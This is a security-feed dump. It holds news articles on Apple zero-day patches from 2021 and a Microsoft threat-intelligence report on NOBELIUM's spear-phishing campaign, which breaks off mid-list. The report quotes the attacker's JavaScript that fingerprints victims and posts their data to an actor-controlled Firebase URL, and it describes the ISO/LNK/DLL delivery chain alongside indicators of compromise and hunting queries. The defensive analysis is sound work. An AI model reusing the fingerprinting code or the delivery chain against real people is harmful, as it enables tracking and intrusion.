CVE-2021-1871) that allowed an attacker to elevate privileges and achieve remote code execution.\n\nInterestingly, Apple also appears to be [experimenting](<https://thehackernews.com/2021/03/apple-may-start-delivering-security.html>) with ways to deliver security updates on iOS in a manner that's independent of other OS updates. iOS 14.4.2 certainly sounds like the kind of update that could benefit from this feature.\n\nIn the meanwhile, users of Apple devices are advised to install the updates as soon as possible to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-03-27T06:07:00", "type": "thn", "title": "Apple Issues Urgent Patch Update for Another Zero\u2011Day Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1782", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879"], "modified": "2021-03-27T08:51:29", "id": "THN:4EFE9C3A3A0DEB0019296A14C9EAC1FA", "href": "https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-27T12:33:47", "description": "[](<https://thehackernews.com/images/-b6kGmU8c6Gc/YP-1oely-GI/AAAAAAAADV0/MURJ7OCSDsoeAi2sHU_Bb2cqNT4e2C-qACLcBGAsYHQ/s0/apple-iphone-hacking.jpg>)\n\nApple on Monday rolled out an urgent security update for [iOS, iPadOS](<https://support.apple.com/en-us/HT212622>), and [macOS](<https://support.apple.com/en-us/HT212623>) to address a zero-day flaw that it said may have been actively exploited, making it the thirteenth such vulnerability Apple has patched since the start of this year.\n\nThe updates, which arrive less than a week after the company released iOS 14.7, iPadOS 14.7, and macOS Big Sur 11.5 to the public, fixes a memory corruption issue (**CVE-2021-30807**) in the IOMobileFrameBuffer component, a kernel extension for managing the screen [framebuffer](<https://en.wikipedia.org/wiki/Framebuffer>), that could be abused to execute arbitrary code with kernel privileges.\n\nThe company said it addressed the issue with improved memory handling, noting it's \"aware of a report that this issue may have been actively exploited.\" As is typically the case, additional details about the flaw have not been disclosed to prevent the weaponization of the vulnerability for additional attacks. Apple credited an anonymous researcher for discovering and reporting the vulnerability.\n\n[](<https://go.thn.li/1-free-728-8> \"Stack Overflow Teams\" )\n\nThe timing of the update also raises questions about whether the zero-day had any role in compromising iPhones using NSO Group's [Pegasus software](<https://forbiddenstories.org/case/the-pegasus-project/>), which has become the focus of a series of [investigative reports](<https://thehackernews.com/2021/07/new-leak-reveals-abuse-of-pegasus.html>) that have exposed how the spyware tool turned mobile phones of journalists, human rights activists, and others into portable surveillance devices, granting complete access to sensitive information stored in them.\n\nCVE-2021-30807 is also the thirteenth zero-day vulnerability addressed by Apple this year alone, including \u2014\n\n * [CVE-2021-1782](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * [CVE-2021-1870](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [CVE-2021-1871](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [CVE-2021-1879](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [CVE-2021-30661](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30663](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30665](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30666](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30713](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n * [CVE-2021-30761](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30762](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n\nGiven the [public availability](<https://twitter.com/b1n4r1b01/status/1419734027565617165>) of a proof-of-concept (PoC) exploit, it's highly recommended that users move quickly to update their devices to the latest version to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-07-27T07:28:00", "type": "thn", "title": "Apple Releases Urgent 0-Day Bug Patch for Mac, iPhone and iPad Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807"], "modified": "2021-07-27T11:14:04", "id": "THN:080F85D43290560CDED8F282EE277B00", "href": "https://thehackernews.com/2021/07/apple-releases-urgent-0-day-bug-patch.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-15T10:34:27", "description": "[](<https://thehackernews.com/images/-EY0jLibkpcU/YMgfQajFNQI/AAAAAAAAC3I/EIU5a5Wq51o-5TvSYm6aKt_vlbbskE6UACLcBGAsYHQ/s0/apple-zero-day.png>)\n\nApple on Monday shipped out-of-band security patches to address two zero-day vulnerabilities in iOS 12.5.3 that it says are being actively exploited in the wild.\n\n[](<https://go.thn.li/1-300-4> \"Stack Overflow Teams\" )\n\nThe latest update, [iOS 12.5.4](<https://support.apple.com/en-us/HT212548>), comes with fixes for three security bugs, including a memory corruption issue in [ASN.1 decoder](<https://en.wikipedia.org/wiki/ASN.1>) (CVE-2021-30737) and two flaws concerning its WebKit browser engine that could be abused to achieve remote code execution \u2014\n\n * **CVE-2021-30761** \\- A memory corruption issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was addressed with improved state management.\n * **CVE-2021-30762** \\- A use-after-free issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was resolved with improved memory management.\n\nBoth CVE-2021-30761 and CVE-2021-30762 were reported to Apple anonymously, with the Cupertino-based company stating in its advisory that it's aware of reports that the vulnerabilities \"may have been actively exploited.\" As is usually the case, Apple didn't share any specifics on the nature of the attacks, the victims that may have been targeted, or the threat actors that may be abusing them.\n\nOne thing evident, however, is that the active exploitation attempts were directed against owners of older devices such as iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). The move mirrors a similar fix that Apple rolled out on May 3 to remediate a buffer overflow vulnerability (CVE-2021-30666) in WebKit targeting the same set of devices.\n\n[](<https://go.thn.li/privileged_728> \"Prevent Data Breaches\" )\n\nAlong with the two aforementioned flaws, Apple has patched a total of 12 zero-days affecting iOS, iPadOS, macOS, tvOS, and watchOS since the start of the year \u2014\n\n * [**CVE-2021-1782**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * [**CVE-2021-1870**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1871**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [**CVE-2021-30657**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [**CVE-2021-30661**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30663**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30665**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30666**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30713**](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n\nUsers of Apple devices are recommended to update to the latest versions to mitigate the risk associated with the vulnerabilities.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-06-15T03:32:00", "type": "thn", "title": "Apple Issues Urgent Patches for 2 Zero-Day Flaws Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30737", "CVE-2021-30761", "CVE-2021-30762"], "modified": "2021-06-15T10:08:36", "id": "THN:0D13405795D42B516C33D8E56A44BA9D", "href": "https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-06-01T20:32:02", "description": "Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the [SUNBURST backdoor](<https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/>), [TEARDROP malware](<https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/>), [GoldMax malware](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>), and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, [Constant Contact](<https://www.constantcontact.com/>), to masquerade as a US-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.\n\nMicrosoft is issuing this alert and new security research regarding this sophisticated [email-based campaign that NOBELIUM has been operating](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>) to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more information on the [Microsoft On The Issues blog](<https://blogs.microsoft.com/on-the-issues/?p=64692>).\n\n> Note: This is an active incident. We will post more details here as they become available.\n> \n> _**Update [05/28/2021]**: We published a new blog post detailing [NOBELIUM's latest early-stage toolset](<https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/>), composed of four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage. _\n\nNOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an [established pattern](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/>) of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.\n\nThis new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service\u2019s URL (many email and document services provide a mechanism to simplify the sharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) delivers coordinated defense against this threat. [Microsoft Defender for Office 365](<https://www.microsoft.com/en-us/microsoft-365/security/office-365-defender>) detects the malicious emails, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) detects the malware and malicious behaviors. Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor communications matching characteristics described in this report and take the actions described below in this article.\n\nWe continue to see an increase in sophisticated and [nation-state-sponsored attacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) and, as part of our ongoing threat research and efforts to protect customers, we will continue to [provide guidance](<https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/>) to the security community on how to secure against and respond to these multi-dimensional attacks.\n\n## Spear-phishing campaign delivers NOBELIUM payloads\n\nThe NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that these observations represent changes in the actor\u2019s tradecraft and possible experimentation following widespread disclosures of previous incidents. \n\n### Early testing and initial discovery\n\nAs part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious payload was observed during this early activity.\n\n### Evolving delivery techniques\n\nIn the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the system.\n\n\n\n_Figure 1. Example Flow of HMTL/ISO infection chain._\n\nHere's an example of target fingerprinting code leveraging Firebase:\n\n`try { \nlet sdfgfghj = ''; \nlet kjhyui = new XMLHttpRequest(); \nkjhyui.open('GET', 'https://api.ipify.org/?format=jsonp?callback=?', false); \nkjhyui.onreadystatechange = function (){ \nsdfgfghj = this.responseText; \n} \nkjhyui.send(null); \nlet ioiolertsfsd = navigator.userAgent; \nlet uyio = window.location.pathname.replace('/',''); \nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj}; \nctryur = JSON.stringify(ctryur); \nlet sdfghfgh = new XMLHttpRequest(); \nsdfghfgh.open('POST', 'https://eventbrite-com-default-rtdb.firebaseio.com/root.json', false); \nsdfghfgh.setRequestHeader('Content-Type', 'application/json'); \nsdfghfgh.send(ctryur); \n} catch (e) {}`\n\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from where the ISO was distributed.\n\nThe phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.\n\n### Escalated targeting and delivery\n\nExperimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the _api.ipify.org_ service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.\n\nIn May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.\n\nOn May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.\n\nIn the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID _<ashainfo@usaid.gov>,_ while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in _@in.constantcontact.com_, and (which varies for each recipient), and a Reply-To address of <_mhillary@usaid.gov>_ was observed. The emails pose as an alert from USAID, as seen below.\n\n\n\n_Figure 2. Example email screenshot._\n\nIf the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:\n\n_https://r20.rs6[.]net/tn.jsp?f=_\n\nThe user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:\n\n_https://usaid.theyardservice[.]com/d/<target_email_address>_\n\nA malicious ISO file is then delivered to the system. Within this ISO file are the following files that are saved in the _%USER%\\__AppData\\Local\\Temp\\<random folder name>\\_ path:\n\n * A shortcut, such as _Reports.lnk_, that executes a custom Cobalt Strike Beacon loader\n * A decoy document, such as _ica-declass.pdf_, that is displayed to the target\n * A DLL, such as _Document.dll_, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft\n\n\n\n_Figure 3. ISO file contents. It is worth noting that the \u201cDocuments.dll\u201d is a hidden file._\n\n\n\n_Figure 4. Shortcut which executes the hidden DLL file._\n\nThe end result when detonating the LNK file is the execution of \u201cC:\\Windows\\system32\\rundll32.exe Documents.dll,Open\u201d.\n\nThe successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised systems. Then, the successful execution of these malicious payloads could enable NOBELIUM to conduct action-on objectives, such as lateral movement, data exfiltration, and delivery of additional malware.\n\nIndicators of compromise (IOCs) for the campaign occurring on May 25 are provided in this blog to help security teams to identify actor activity.\n\nMicrosoft security researchers assess that the NOBELIUM\u2019s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of tactics.\n\nMicrosoft continues to monitor this threat actor\u2019s evolving activities and will update as necessary. [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) protects customers against the multiple components of this threat: malicious emails, file attachments, connections, malware payloads, other malicious artifacts, and attacker behavior. Refer to the detection details below for specific detection names and alerts. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate variants of actor activity.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Run [EDR in block mode ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable[ investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Enable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers download and use passwordless solutions like Microsoft Authenticator to [secure your accounts](<https://www.microsoft.com/en-us/account/authenticator/>).\n * For Office 365 users, see [multifactor authentication support](<https://docs.microsoft.com/en-us/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365-worldwide&viewFallbackFrom=o365worldwide>).\n * For Consumer and Personal email accounts, see how to use [two-step verification](<https://support.microsoft.com/en-us/account-billing/how-to-use-two-step-verification-with-your-microsoft-account-c7910146-672f-01e9-50a0-93b4585e7eb4>).\n * Turn on the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat: _Block all Office applications from creating child processes_. NOTE: [Assess rule impact](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/evaluate-attack-surface-reduction?view=o365-worldwide>) before deployment.\n\n## Indicators of compromise (IOC)\n\nThis attack is still active, so these indicators should not be considered exhaustive for this observed activity. These indicators of compromise are from the large-scale campaign launched on May 25, 2021.\n\n \n\nINDICATOR | TYPE | DESCRIPTION \n---|---|--- \nashainfo@usaid.gov | Email | Spoofed email account \nmhillary@usaid.gov | Email | Spoofed email account \n2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 | SHA-256 | Malicious ISO file (container) \nd035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 | SHA-256 | Malicious ISO file (container) \n94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 | SHA-256 | Malicious ISO file (container) \n48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 | SHA-256 | Malicious shortcut (LNK) \nee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c | SHA-256 | Cobalt Strike Beacon malware \nee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 | SHA-256 | Cobalt Strike Beacon malware \nusaid.theyardservice[.]com | Domain | Subdomain used to distribute ISO file \nworldhomeoutlet[.]com | Domain | Subdomain in Cobalt Strike C2 \ndataplane.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \ncdn.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \nstatic.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \n192[.]99[.]221[.]77 | IP address | IP resolved to by _worldhomeoutlet[.]com_ \n83[.]171[.]237[.]173 | IP address | IP resolved to by *_theyardservice[.]com_ \ntheyardservice[.]com | Domain | Actor controlled domain \n \n## Detection details\n\n### Antivirus\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [Trojan:Win32/NativeZone.C!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/NativeZone.C!dha&threatId=-2147185566>)\n\n### Endpoint detection and response (EDR)\n\nAlerts with the following titles in the Security Center can indicate threat activity on your network:\n\n * Malicious ISO File used by NOBELIUM\n * Cobalt Strike Beacon used by NOBELIUM\n * Cobalt Strike network infrastructure used by NOBELIUM\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * An uncommon file was created and added to startup folder.\n * A link file (LNK) with unusual characteristics was opened.\n\n## Advanced hunting\n\n### Microsoft 365 Defender\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days\u2019 worth of raw data to inspect events in your network and locate potential NOBELIUM mass email-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\nTo locate possible exploitation activity, run the following query in the Microsoft 365 security center:\n\n##### NOBELIUM abuse of USAID Constant Contact resources in email data\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2QzQqCUBCFzzroHURaS7Ro5y6DFraJHkDUzH6uoJabHr7PMWojIQN3fs-ZMzfSXYlK3XRUzbuT00mVPM010wvf6aycXk48zGzoDyhHLcQ8-XRWWirAN1rjHYiW-o_pAm7AXM1nIHvvjN9T9NUS6UnNgW-oV4ZZUM_R1sK9N-6OTg1XTNZgiQqinfGGzNdwFaifghi_92AqMsvjj7YtcX__-C_0WaDUNDdsTOyKIe-z1NSkhvUnbP2_7WE3lMwGXFLxa77e-0liDdIBAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2qzqqcubcfzzrohuras7ro5y6dfrajhkduzh6uojabhr7pmwojiqn3fs-zmzfsxylk3xruzbut00mvpm010wvf6aycxk48zgzodyhhlcq8-xrwwiran1rjhyiw-o_pam7axm1nihvvjn9t9nus6unngw-ov4zzum_r1sk9n-6otg1xtnzgiqqinfggzndwfaifghi_92aqmsvjj7ytcx__-c_0wadunddstoykie-z1nskhvunbp2_7we3lmwgxflxa77e-0liddibaaa&runquery=true&timerangeid=week\" )\n\n`EmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" `\n\n##### NOBELIUM subject lines used in abuse of Constant Contact service\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. It also specifies email subject keywords seen in phishing campaigns in late May using the term \u201cSpecial Alert!\u201d in various ways in the subject. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2SS2vCQBSFz1rofwihiwoSpItuiguhCi7sRruWaX1UjRNJYkXoj-83d6RkYUoJw32eM-feTK6VaiWa6aR37Yg-iOfYUgdVVAacoxz5vRbYks_pQvZBKbijYbbkcuIeZ4gX8DV-V8-6U0cj2Bxdud6o5JrIa63Cat9wnfVpmBV-7HihGjHeVAQdKZVH9ZVhKz1hvelPf3l2oCJib3YJLlhv7ElDx0hf5DzoMGVhmHtTviaX6dWYz1RKuKZEFZ_TBm9ivAP6S7g2aP8P4tasM9OwtHh6VTbGD7Pf3kCIMjYeFFfc52yGGNf2n-pr_dDYS9udf991Mv1bejOmKNhYG2Pz9SRUHMiFaYsvpe19dfUDjw6wVYICAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2ss2vcqbsfz1rofwihiwospituiguhci7srruwax1ujrnjykxoj-83d6rkyuojw32em-fetk6vaiwa6ar37yg-iofyugdvvaacoxz5vrbyks_pqvzbkbijybbkcuiez4gx8dv-v8-6u0cj2bxdud6o5jria63cat9wnfvpmbv-7hihgjhevaqdkzvh9zvhkz1hvelpf3l2ocjib3yjllhv7eldx0hf5dzomgvhmhttviax6dwyz1rkukzefz_tbm9ivap6s7g2ap8p4tasm9owthh6vtbgd7pf3kcimjyefffc52yggnf2n-pr_ddys9udf991mv1bejomknhyg2pz9sruhmifaysvpe19dfudjw6wvyicaaa&runquery=true&timerangeid=week\" )\n\n`let SubjectTerms = pack_array (\"Special\",\"Alert\"); \nEmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" \n| where Subject has_any (SubjectTerms) `\n\n### Azure Sentinel\n\n##### NOBELIUM exploitation search using Azure Sentinel\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/NOBELIUM_IOCsMay2021.yaml> \"https://github.com/azure/azure-sentinel/blob/master/detections/multipledatasources/nobelium_iocsmay2021.yaml\" ).\n\n## MITRE ATT&CK techniques observed\n\nThis threat makes use of attacker techniques documented in the [MITRE ATT&CK framework](<https://attack.mitre.org/>).\n\n### Initial access\n\n * [T1566.003 Phishing: Spearphishing via Service](<https://attack.mitre.org/techniques/T1566/003/>)\u2014NOBELIUM used the legitimate mass mailing service, Constant Contact to send their emails.\n * [T1566.002 Phishing: Spearphishing Link](<https://attack.mitre.org/techniques/T1566/002/>)\u2014The emails sent by NOBELIUM includes a URL that directs a user to the legitimate Constant Contact service that redirects to NOBELIUM-controlled infrastructure.\n\n### Execution\n\n * [T1610 Deploy 